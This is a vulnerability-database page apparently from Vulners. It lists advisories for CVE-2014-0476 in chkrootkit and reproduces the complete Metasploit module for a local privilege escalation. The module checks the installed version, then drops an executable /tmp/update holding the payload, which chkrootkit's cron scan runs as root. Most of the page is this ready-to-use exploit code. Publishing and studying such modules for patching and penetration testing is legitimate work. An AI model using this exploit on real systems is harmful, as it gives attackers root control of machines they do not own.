Lucene search
Chkrootkit Local Privilege Escalation
🗓️ 18 Nov 2015 18:57:50Reported by Thomas Stangner, Julien "jvoisin" VoisinType 
metasploit🔗 www.rapid7.com👁 59 Views
Chkrootkit Local Privilege Escalation. Executes /tmp/update as root, leading to trivial privilege escalation. WfsDelay set to 24h for chkrootkit scan
Show more
| Reporter | Title | Published | Views | Family All 45 |
|---|---|---|---|---|
 | CVE-2014-0476 | 25 Oct 201422:55 | – | cve |
 | Fedora 19 : chkrootkit-0.49-9.fc19 (2014-7090) | 13 Jun 201400:00 | – | nessus |
| Debian DSA-2945-1 : chkrootkit - security update | 4 Jun 201400:00 | – | nessus |
| Mandriva Linux Security Advisory : chkrootkit (MDVSA-2014:122) | 12 Jun 201400:00 | – | nessus |
| GLSA-201709-05 : chkrootkit: Local privilege escalation | 18 Sep 201700:00 | – | nessus |
| Ubuntu 14.04 LTS : chkrootkit vulnerability (USN-2230-1) | 5 Jun 201400:00 | – | nessus |
| Amazon Linux AMI : chkrootkit (ALAS-2014-370) | 12 Oct 201400:00 | – | nessus |
| Fedora 20 : chkrootkit-0.49-9.fc20 (2014-7071) | 13 Jun 201400:00 | – | nessus |
 | Mageia: Security Advisory (MGASA-2014-0249) | 28 Jan 202200:00 | – | openvas |
| Amazon Linux: Security Advisory (ALAS-2014-370) | 8 Sep 201500:00 | – | openvas |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
# This could also be Excellent, but since it requires
# up to one day to pop a shell, let's set it to Manual instead.
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Chkrootkit Local Privilege Escalation',
'Description' => %q{
Chkrootkit before 0.50 will run any executable file named /tmp/update
as root, allowing a trivial privilege escalation.
WfsDelay is set to 24h, since this is how often a chkrootkit scan is
scheduled by default.
},
'Author' => [
'Thomas Stangner', # Original exploit
'Julien "jvoisin" Voisin' # Metasploit module
],
'References' => [
['CVE', '2014-0476'],
['OSVDB', '107710'],
['EDB', '33899'],
['BID', '67813'],
['URL', 'https://seclists.org/oss-sec/2014/q2/430']
],
'DisclosureDate' => '2014-06-04',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => ['shell', 'meterpreter'],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 24.hours.seconds.to_i },
'Notes' => {
'Reliability' => [REPEATABLE_SESSION],
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
])
end
def check
version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
if version =~ /chkrootkit version 0\.[1-4]/
CheckCode::Appears
else
CheckCode::Safe
end
end
def exploit
print_warning('Rooting depends on the crontab (this could take a while)')
write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
cmd_exec('chmod +x /tmp/update')
register_file_for_cleanup('/tmp/update')
print_status('Payload written to /tmp/update')
print_status('Waiting for chkrootkit to run via cron...')
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo18 Nov 2015 18:50Current
7High risk
Vulners AI Score7
CVSS23.7
EPSS0.09333